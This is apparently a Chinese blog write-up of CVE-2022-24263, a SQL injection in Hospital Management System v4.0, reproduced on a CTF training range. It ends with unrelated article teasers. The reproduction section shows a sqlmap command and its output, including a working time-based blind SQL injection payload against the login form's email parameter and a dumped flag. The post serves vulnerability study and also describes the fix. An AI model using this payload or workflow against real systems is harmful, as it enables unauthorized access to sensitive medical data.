Hospital Management System v4.0 SQL 注入漏洞(CVE-2022-24263)

前言

CVE-2022-24263 是一个影响 Hospital Management System (HMS) v4.0 的 SQL 注入漏洞。这个漏洞允许攻击者通过注入恶意 SQL 代码来获取数据库的敏感信息,甚至可能控制整个数据库。以下是对这个漏洞的详细介绍:

漏洞描述

在 Hospital Management System v4.0 中,存在多个输入字段没有正确过滤用户输入,导致 SQL 注入漏洞。攻击者可以通过构造特定的 SQL 查询,将恶意代码注入到系统中,进而访问或修改数据库中的数据。

影响范围

任何运行 Hospital Management System v4.0 的系统都可能受到此漏洞的影响。如果系统没有应用适当的安全更新或修复,攻击者可以利用这个漏洞对数据库进行未授权的访问。

漏洞利用

利用这个漏洞的一个常见方法是通过登录表单或其他用户输入点注入恶意 SQL 代码。例如,攻击者可能会在用户名或密码字段中输入特殊构造的 SQL 语句,从而绕过身份验证或执行其他数据库操作。

修复措施

要修复此漏洞,开发者应确保所有用户输入都经过严格的验证和过滤,特别是在生成 SQL 查询时。此外,采用预编译语句(prepared statements)和参数化查询可以有效防止 SQL 注入攻击。

春秋云镜靶场是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和攻击场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:

实战演练:

提供各种网络安全攻防演练场景,模拟真实的网络攻击事件,帮助用户在实际操作中掌握网络安全技术。
场景涵盖Web安全、系统安全、网络安全、社工攻击等多个领域。

漏洞复现:

用户可以通过平台对已知的安全漏洞进行复现,了解漏洞的产生原因、利用方法和修复措施。
通过实战操作,帮助用户掌握漏洞利用和防护的技能。

教学培训:

提供系统化的网络安全课程,从基础到高级,覆盖多个安全领域,适合不同水平的用户。
包含理论讲解和实战操作,帮助学员全面提升网络安全知识和实战能力。

竞赛与评测:

定期举办网络安全竞赛,如CTF(Capture The Flag)比赛,激发学员的学习兴趣和动力。
提供个人和团队的安全能力评测,帮助学员了解自己的安全技能水平。

资源共享:

平台提供丰富的学习资源,包括教程、工具、案例分析等,方便用户随时查阅和学习。
用户可以在社区中分享经验和资源,互相交流和学习。

春秋云镜靶场适合网络安全从业人员、学生以及对网络安全感兴趣的个人,通过在平台上进行不断的学习和实战演练,可以有效提升网络安全技能和防护能力。

介绍

Hospital Management System (HMS) v4.0 是一款综合性的医疗管理软件,专为医疗机构设计,以简化和优化医院的管理流程和操作。以下是 HMS v4.0 的主要特点和功能:

主要特点

  1. 患者管理

    • 记录和管理患者的详细信息,包括基本信息、病历、就诊记录和治疗方案。
    • 支持患者的入院、出院和转院管理。
  2. 预约管理

    • 提供便捷的预约系统,患者可以在线预约医生,减少排队时间,提高就诊效率。
    • 医生可以查看和管理预约记录,安排和调整日程。
  3. 医生管理

    • 管理医生的详细信息和工作安排。
    • 记录医生的就诊记录和手术记录,便于绩效考核和工作评估。
  4. 药品管理

    • 记录和管理医院药品库存,包括药品的采购、库存、发放和使用情况。
    • 提供药品使用报告和库存预警,确保药品供应的及时和安全。
  5. 财务管理

    • 管理医院的财务收支,包括挂号费、诊疗费、药品费和其他费用。
    • 提供详细的财务报表和统计分析,帮助医院进行财务管理和决策。
  6. 病房管理

    • 管理病房和床位信息,包括病房的分配、使用和维护。
    • 提供病房的实时状态,便于医院进行资源调配和管理。
  7. 实验室管理

    • 管理实验室的检验项目和结果,记录患者的检验报告。
    • 提供检验数据的统计分析,辅助医生进行诊断和治疗。
  8. 报告生成

    • 生成各种管理报告和统计分析,包括患者报告、财务报告、药品使用报告等。
    • 支持自定义报表,满足不同用户的需求。

应用场景

Hospital Management System v4.0 适用于各种类型和规模的医疗机构,包括:

  • 综合医院:大中型综合医院,可以利用 HMS 的全面功能,提升医院的管理效率和服务质量。
  • 专科医院:专注于某一专科的医院,可以根据需要定制 HMS 的模块,专注于特定领域的管理。
  • 诊所和门诊部:小型医疗机构可以利用 HMS 的核心功能,提高日常运营的效率。

优势

  1. 提高管理效率:通过信息化管理,减少人工操作,提高工作效率和准确性。
  2. 优化患者体验:提供便捷的预约和就诊服务,缩短患者等待时间,提升患者满意度。
  3. 增强数据安全:通过权限控制和数据加密,保护患者隐私和医院数据的安全。
  4. 支持决策分析:通过全面的统计分析和报表生成,辅助医院管理层进行决策。

总结

Hospital Management System v4.0 是一款功能强大、操作简便的医疗管理软件,旨在通过信息化手段,优化医院的管理流程,提高工作效率和服务质量。它适用于各类医疗机构,是现代医院管理的理想选择。

漏洞复现

打开靶场

进入靶场是这个页面

网上查找漏洞相关信息

点击登录

可以看到有一个邮箱参数及密码,这里应该就是漏洞了 

打开 BurpSuite 拦截抓包

复制值到 txt 文件中,使用 SQLMap 开跑

省略爆库爆表过程……(太慢了)

D:\CVE\sqlmap-master>python sqlmap.py -r sqlmap-post.txt -D "ctf" -T "flag" -C "flag" --dump_____H_____ ___[)]_____ ___ ___  {1.8.6.17#dev}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 22:17:15 /2024-07-03/[22:17:15] [INFO] parsing HTTP request from 'sqlmap-post.txt'
[22:17:16] [INFO] resuming back-end DBMS 'mysql'
[22:17:16] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=a4p7mmiqgl2...ugmsr9eago'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: email=666@qq.com' AND (SELECT 1648 FROM (SELECT(SLEEP(5)))CpfC) AND 'ThOA'='ThOA&password2=123&patsub=Login
---
[22:17:17] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.20, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[22:17:17] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'ctf'
[22:17:17] [INFO] fetching number of column(s) 'flag' entries for table 'flag' in database 'ctf'
[22:17:17] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[22:17:20] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n
1
[22:17:41] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{d3ca3cd0-568f-48ff-bc52-421bffb4a
[22:29:51] [ERROR] invalid character detected. retrying..
ba6}
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{d3ca3cd0-568f-48ff-bc52-421bffb4aba6} |
+--------------------------------------------+[22:31:04] [INFO] table 'ctf.flag' dumped to CSV file 'C:\Users\ydd33\AppData\Local\sqlmap\output\eci-2zeculqw9h9wqm1tjdmm.cloudeci1.ichunqiu.com\dump\ctf\flag.csv'
[22:31:04] [INFO] fetched data logged to text files under 'C:\Users\ydd33\AppData\Local\sqlmap\output\eci-2zeculqw9h9wqm1tjdmm.cloudeci1.ichunqiu.com'[*] ending @ 22:31:04 /2024-07-03/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/43173.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【MindSpore学习打卡】应用实践-自然语言处理-深入理解LSTM+CRF在序列标注中的应用

在自然语言处理(NLP)领域,序列标注是一项重要的任务。其目标是为给定的输入序列中的每个Token分配一个标签。序列标注的应用范围广泛,包括分词、词性标注、命名实体识别(NER)等。在本文中,我们将探讨如何利用LSTM和CRF模型进行序列标注&#…

无人机之穿越机知识篇

一、定义和类型 穿越机,即FPV Drone或Racing Drone,是一种主要通过第一人称视角(FPV)进行操作的无人机。这种无人机通常配备有四个电机和相应的飞控系统,使其具有极高的飞行自由度和速度。穿越机主要分为竞速型和花飞…

electron在VSCode和IDEA及webStrom等编辑器控制台打印日志乱码

window10环境下设置 1.打开Windows设置 2.打开时间和语言,选择语言菜单、如何点击管理语言设置 3.打开之后选择管理,选择更改系统区域设置,把Beta版:使用Unicode UTF-8提供全球语言支持 勾上,点击确定,…

甄选范文“论区块链技术及应用”,软考高级论文,系统架构设计师论文

论文真题 区块链作为一种分布式记账技术,目前已经被应用到了资产管理、物联网、医疗管理、政务监管等多个领域。从网络层面来讲,区块链是一个对等网络(Peer to Peer, P2P),网络中的节点地位对等,每个节点都保存完整的账本数据,系统的运行不依赖中心化节点,因此避免了中…

MySQL 9.0 新功能概览

官方文档 https://dev.mysql.com/doc/refman/9.0/en/mysql-nutshell.html 时隔 6 年多,上周 Oracle 发布了 MySQL 最新的大版本 9.0。我们一起来看看新版本有哪些东西。 用 JavaScript 写存储过程 半年前已经单独介绍过 「虽迟但到!MySQL 可以用 Java…

方圆资源网,方圆资源官网

在当今这个信息化高速发展的时代,方圆资源网络已成为推动社会进步、促进经济发展的重要力量。方圆资源网不仅汇聚了海量的信息资源,更为我们提供了一个高效、便捷的信息交流平台。本文旨在详细介绍资源网的概念、特点、功能以及其在现代社会中的重要意义…

DeepMind的JEST技术:AI训练速度提升13倍,能效增强10倍,引领绿色AI革命

谷歌旗下的人工智能研究实验室DeepMind发布了一项关于人工智能模型训练的新研究成果,声称其新提出的“联合示例选择”(Joint Example Selection,简称JEST)技术能够极大地提高训练速度和能源效率,相比其他方法&#xff…

华为乾崑智驾加持:深蓝S07首次亮相

最近,特斯拉FSD即将入华的消息,让智能驾驶成为了汽车行业热议的焦点,而当新能源汽车的代表企业深蓝汽车,与全球领先的华为乾崑智驾强强联手,一场颠覆性的智能出行变革也已蓄势待发。 7月8日,深蓝汽车携其最…

[数仓]四、离线数仓(Hive数仓系统-续)

第8章 数仓搭建-DWT层 8.1 访客主题 1)建表语句 DROP TABLE IF EXISTS dwt_visitor_topic; CREATE EXTERNAL TABLE dwt_visitor_topic (`mid_id` STRING COMMENT 设备id,`brand` STRING COMMENT 手机品牌,`model` STRING COMMENT 手机型号,`channel` ARRAY<STRING> C…

MinIO - 服务端签名直传(前端 + 后端 + 效果演示)

目录 开始 服务端签名直传概述 代码实现 后端实现 前端实现 效果演示 开始 服务端签名直传概述 传统的&#xff0c;我们有两种方式将图片上传到 OSS&#xff1a; a&#xff09;前端请求 -> 后端服务器 -> OSS 好处&#xff1a;在服务端上传&#xff0c;更加安全…

Android - 云游戏本地悬浮输入框实现

一、简述 云游戏输入法分两种情况,以云化原神为例,分为 云端输入法 和 本地输入法,运行效果如下: 云端输入法本地输入法云端输入法 就是运行在云端设备上的输入法,对于不同客户端来说(Android、iPhone),运行效果一致。 本地输入法 则是运行在用户侧设备上的输入法,对…

Fastapi在docekr中进行部署之后,uvicorn占用的CPU非常高

前一段接点小活&#xff0c;做点开发&#xff0c;顺便学了学FASTAPI框架&#xff0c;对比flask据说能好那么一些&#xff0c;至少并发什么的不用研究其他的asgi什么的&#xff0c;毕竟不是专业开发&#xff0c;能少研究一个东西就省了很多的事。 但是部署的过程中突然之间在do…

Zabbix分布式监控

目录 分布式监控架构 实现分布式监控的步骤 优点和应用场景 安装Zabbix_Proxy Server端Web页面配置 测试 Zabbix 的分布式监控架构允许在大规模和地理上分散的环境中进行高效的监控。通过分布式监控&#xff0c;Zabbix 可以扩展其监控能力&#xff0c;支持大量主机和设备…

基于全志Orangepi Zero 2 的语音刷抖音项目

目录 一、硬件连接 二、项目实现功能 三、SU-03T语音模块的配置和烧录 3.1 创建产品&#xff1a; 3.2 设置PIN引脚为串口模式&#xff1a; 3.3 设置唤醒词&#xff1a; 3.4 设置指令语句&#xff1a; 3.5 设置控制详情&#xff1a; 3.6 发音人配置&#xff1a; 3.7 其…

atcoder 357 F Two Sequence Queries (线段树板子)

题目&#xff1a; 分析&#xff1a; 线段树 代码&#xff1a; // Problem: F - Two Sequence Queries // Contest: AtCoder - SuntoryProgrammingContest2024&#xff08;AtCoder Beginner Contest 357&#xff09; // URL: https://atcoder.jp/contests/abc357/tasks/abc357_…

华为HCIP Datacom H12-821 卷29

1.多选题 下面关于LSA age字段&#xff0c;描述正确的是∶ A、LSA age的单位为秒&#xff0c;在LSDB中的LSA的LS age随时间增长而增长 B、LSA age的单位为秒&#xff0c;在LSDB中的LSA的LS age随时间增长而减少 C、如果一条LSA的LS age达到了LS RefreshTime&#xff08…

[spring] Spring MVC - security(下)

[spring] Spring MVC - security&#xff08;下&#xff09; callback 一下&#xff0c;当前项目结构如下&#xff1a; 这里实现的功能是连接数据库&#xff0c;大范围和 [spring] rest api security 重合 数据库连接 - 明文密码 第一部分使用明文密码 设置数据库 主要就是…

内存与硬盘(笔记)

文章目录 1. 内存① 笔记② 相关软件 2. 硬盘① 笔记② 相关软件 3. 区别&#xff1a;4. 推荐 1. 内存 ① 笔记 ① 笔记本的内存条和台式机的内存条是不互通的 ② 我们常说的内存其实指的是运行内存(前台后台同时能运行多少APP) ③ 下图来自京东&#xff1a; 解析&#xff1…

ubuntu 分区情况

ubuntu系统安装与分区指南 - Philbert - 博客园 (cnblogs.com)https://www.cnblogs.com/liangxuran/p/14872811.html 详解安装Ubuntu Linux系统时硬盘分区最合理的方法-腾讯云开发者社区-腾讯云 (tencent.com)https://cloud.tencent.com/developer/article/1711884

终于找到了免费的C盘清理软件(极智C盘清理)

搜了很久&#xff0c;终于让我找到了一款 完全免费的C盘清理软件&#xff08;极智C盘清理&#xff09;。 点击前往官网免费使用极智C盘清理软件&#xff1a; C盘清理 用户好评 完全免费的极智C盘清理 用极智C盘清理清理了下系统的临时文件、缓存等无用数据文件&#xff0c;C盘终…